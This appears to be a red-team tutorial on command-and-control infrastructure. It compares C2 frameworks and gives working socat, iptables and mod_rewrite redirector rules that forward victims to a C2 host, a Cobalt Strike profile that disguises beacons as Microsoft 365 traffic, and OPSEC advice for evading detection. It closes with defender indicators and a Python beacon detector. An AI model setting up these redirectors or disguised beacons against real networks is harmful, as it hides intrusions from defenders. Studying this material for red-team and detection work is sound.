C2 Infrastructure: Command & Control
The C2 server is the attacker's command center. It receives beacons from compromised systems, issues commands, and collects exfiltrated data. Building resilient C2 infrastructure is what separates script kiddies from sophisticated operators.
What is Command & Control?
C2 (Command and Control) is the infrastructure attackers use to communicate with implants on compromised systems. Think of it as the attacker's remote management system.
C2 ARCHITECTURE

  COMPROMISED          REDIRECTORS            C2 SERVER
  TARGETS              (Disposable)           (Protected)

  ┌─────────┐
  │ Target1 │────┐
  └─────────┘    │     ┌─────────────┐        ┌───────────────┐
                 ├────►│ Redirector1 │───────►│   C2 SERVER   │
  ┌─────────┐    │     └─────────────┘        │               │
  │ Target2 │────┤                            │ Cobalt Strike │
  └─────────┘    │     ┌─────────────┐        │ Sliver        │
                 ├────►│ Redirector2 │───────►│ Havoc         │
  ┌─────────┐    │     └─────────────┘        └───────────────┘
  │ Target3 │────┘
  └─────────┘

  Beacons go OUT   ──────────────────────────────────────────►
  Commands come IN ◄──────────────────────────────────────────
C2 Frameworks
Several frameworks exist for managing C2 operations. Each has trade-offs between features, detection, and operational security.
Cobalt Strike
The industry standard for professional red teams. Commercial license (~$5,900/year). Mature, feature-rich, extensive documentation. Also the most signatured by defenders.
Pros
- Extremely feature-rich
- Malleable C2 profiles
- Built-in pivoting
- Team collaboration
- Extensive documentation
Cons
- Expensive ($5,900/yr)
- Heavily signatured
- Cracked versions everywhere
- Defenders know it well
- Default configs = instant detection
Sliver
Open-source C2 from Bishop Fox. Modern Go-based implants, growing rapidly. Free, actively developed, increasingly capable.
Pros
- Free and open-source
- Modern architecture
- Cross-platform implants
- Built-in obfuscation
- Active development
Cons
- Less mature than CS
- Smaller community
- Getting signatured now
- Fewer evasion options
Havoc
Newer open-source C2 with a modern GUI. Designed to look and feel like Cobalt Strike but free. Growing community and rapid development.
Other Notable C2s
- Empire - PowerShell/Python agents, great for Windows
- Covenant - .NET based, good for evasion
- Mythic - Modular, multi-agent, Docker-based
- Brute Ratel - Commercial, designed to evade EDR
- Merlin - HTTP/2 based, stealthy
Redirectors: Protecting Your C2
Never expose your C2 server directly. Redirectors are disposable servers that forward traffic to your actual C2. If defenders block or investigate the redirector, your real infrastructure stays hidden.
# On redirector server - forward 443 to C2
socat TCP4-LISTEN:443,fork TCP4:c2-server.internal:443

# Or with iptables
iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination C2_IP:443
iptables -t nat -A POSTROUTING -j MASQUERADE

# Apache mod_rewrite for filtering
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} "^Mozilla/5.0.*Windows NT 10" [NC]
RewriteRule ^(.*)$ https://real-c2.com/$1 [P]
RewriteRule ^(.*)$ https://legitimate-site.com/$1 [L,R=302]
Use cheap VPS providers (DigitalOcean, Linode, Vultr) for redirectors. Deploy in different geographic regions. Rotate frequently. If one gets burned, spin up a new one in minutes.
Domain Fronting & CDN Abuse
Domain fronting hides C2 traffic behind legitimate CDN domains. Your traffic appears to go to google.com or cloudfront.net while actually reaching your C2.
How It Works
- Implant connects to allowed-cdn.cloudfront.net (allowed by firewall)
- TLS SNI shows legitimate domain
- HTTP Host header contains your C2: Host: evil-c2.cloudfront.net
- CDN routes to your actual C2 backend
Note: Major CDNs (AWS, Google, Azure) have largely blocked this. Still works with some smaller CDNs and specific configurations.
Malleable C2 Profiles
Cobalt Strike's malleable profiles let you customize how beacon traffic looks. Make it look like legitimate traffic—Slack API calls, Microsoft 365, Google services.
# Make beacon look like Microsoft 365 traffic
http-get {
    set uri "/api/v2.0/users/messages";
    client {
        header "Host" "outlook.office365.com";
        header "Accept" "application/json";
        header "Authorization" "Bearer eyJ...";
        metadata {
            base64url;
            prepend "auth_token=";
            header "Cookie";
        }
    }
    server {
        header "Content-Type" "application/json";
        output {
            base64url;
            prepend "{\"value\":[{\"id\":\"";
            append "\"}]}";
            print;
        }
    }
}
Operational Security
Infrastructure OPSEC
- Never access C2 from personal IP
- Use VPN/Tor for management
- Separate long-haul vs short-haul C2
- Aged, categorized domains
- Valid SSL certificates (Let's Encrypt)
- Geographic distribution
Traffic OPSEC
- Blend with normal traffic patterns
- Business hours beaconing
- Jitter on callbacks (30-50%)
- Use common ports (80, 443)
- Mimic legitimate user-agents
- Encrypted payloads
Short-haul C2: Interactive sessions, frequent callbacks, used during active operations. More likely to be detected. Disposable.
Long-haul C2: Slow beacons (hours/days), persistent access, backup channel. Stays dormant until needed. Harder to detect.
Detection: How Defenders Find C2
Network Indicators
- Beaconing patterns (regular intervals)
- JA3/JA3S TLS fingerprints
- Unusual DNS patterns
- High entropy in payloads
- Known-bad IPs/domains
- Certificate anomalies
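The beaconing indicator above, and the 30-50% jitter described under Traffic OPSEC, can be checked with simple interval statistics over proxy logs. This is an added example written for this page, not code from any C2 framework or detection product; the log lines, hosts and IPs are constructed, and the coefficient-of-variation threshold is an assumption you would tune to your own traffic.

```python
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed proxy log: "<ISO timestamp> <src_ip> <dst_host> <bytes_out>".
# 10.0.0.5 calls back roughly every 60 s with ~30% jitter (gaps 43-59 s);
# 10.0.0.7 is bursty, human-looking browsing.
SAMPLE_LOG = """\
2024-03-04T09:00:00 10.0.0.5 updates.example-cdn.net 412
2024-03-04T09:00:45 10.0.0.5 updates.example-cdn.net 408
2024-03-04T09:01:40 10.0.0.5 updates.example-cdn.net 415
2024-03-04T09:02:28 10.0.0.5 updates.example-cdn.net 410
2024-03-04T09:03:27 10.0.0.5 updates.example-cdn.net 409
2024-03-04T09:04:10 10.0.0.5 updates.example-cdn.net 414
2024-03-04T09:00:12 10.0.0.7 www.example.com 1822
2024-03-04T09:00:13 10.0.0.7 www.example.com 954
2024-03-04T09:03:51 10.0.0.7 www.example.com 3310
2024-03-04T09:19:02 10.0.0.7 www.example.com 2201
2024-03-04T09:19:04 10.0.0.7 www.example.com 780
2024-03-04T09:47:33 10.0.0.7 www.example.com 1609
"""

def parse_log(text):
    """Parse the constructed log format into (timestamp, src, dst, bytes) tuples."""
    records = []
    for line in text.splitlines():
        ts, src, dst, size = line.split()
        records.append((datetime.fromisoformat(ts), src, dst, int(size)))
    return records

def interval_stats(timestamps):
    """Mean gap in seconds and coefficient of variation (stdev / mean) of the gaps."""
    ts = sorted(timestamps)
    gaps = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
    mean = statistics.fmean(gaps)
    cv = statistics.stdev(gaps) / mean if mean > 0 else float("inf")
    return mean, cv

def find_beacons(records, min_requests=6, max_cv=0.5):
    """Flag (src, dst) pairs whose callback timing is too regular to be a person.
    Jitter does not hide this: a sleep randomly shortened by up to 50% yields
    CV around 0.19, while interactive browsing usually sits well above 1."""
    by_pair = defaultdict(list)
    for ts, src, dst, _size in records:
        by_pair[(src, dst)].append(ts)
    hits = {}
    for pair, stamps in by_pair.items():
        if len(stamps) < min_requests:       # too few events to judge
            continue
        mean, cv = interval_stats(stamps)
        if cv <= max_cv:
            hits[pair] = {"count": len(stamps), "mean_interval": mean, "cv": round(cv, 3)}
    return hits
```

In production you would run this per destination over sliding windows (an hour, a day) so that long-haul beacons with hour-scale sleeps are not lost among short-haul noise, and pair it with the payload-size consistency of the same flows.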
Host Indicators
- Process injection artifacts
- Unusual parent-child processes
- Memory-only implants (no disk)
- Named pipes (Cobalt Strike default)
- Suspicious scheduled tasks
- Registry persistence